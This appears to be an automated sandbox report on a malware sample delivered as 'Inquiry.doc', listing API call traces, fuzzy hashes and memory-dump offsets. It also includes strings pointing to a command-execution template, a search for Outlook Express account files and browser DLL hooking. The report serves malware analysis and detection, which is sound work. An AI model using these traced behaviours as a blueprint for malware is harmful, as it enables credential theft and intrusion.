    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD885, Relevance: 6.1, APIs: 4, Instructions: 61 Total matches: 76memorystring
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7471, Relevance: 6.1, APIs: 4, Instructions: 59 Total matches: 43stringthreadtime
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2554, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4E59, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystring
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2884, Relevance: 6.0, APIs: 4, Instructions: 41 Total matches: 66filestringsynchronization
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBCD2, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 99filesynchronizationpipe
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDF8E, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 105memorythread
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B329FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DD61D, Relevance: 6.0, APIs: 4, Instructions: 29 Total matches: 151sleepmemory
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA895, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7222, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58 Total matches: 58
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C77DE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E21, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46 Total matches: 59
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6241, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D87D7, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE2F9, Relevance: 5.1, APIs: 4, Instructions: 70 Total matches: 113string
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 64193

General

Root Process Name:d3d8sext.exe
Process MD5:DA7FC1804FFFBD92337277B095147E63
Total matches:141
Initial Analysis Report:Open
Initial sample Analysis ID:64193
Initial sample SHA 256:E999616249FE0433E41C5B578EFB3333A0DBFCF040B6DE1C8AFA4905C4B736A1
Initial sample name:Inquiry.doc

Similar Executed Functions

Function 001CDA13, Relevance: 10.6, APIs: 7, Instructions: 111 Total matches: 36string
Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
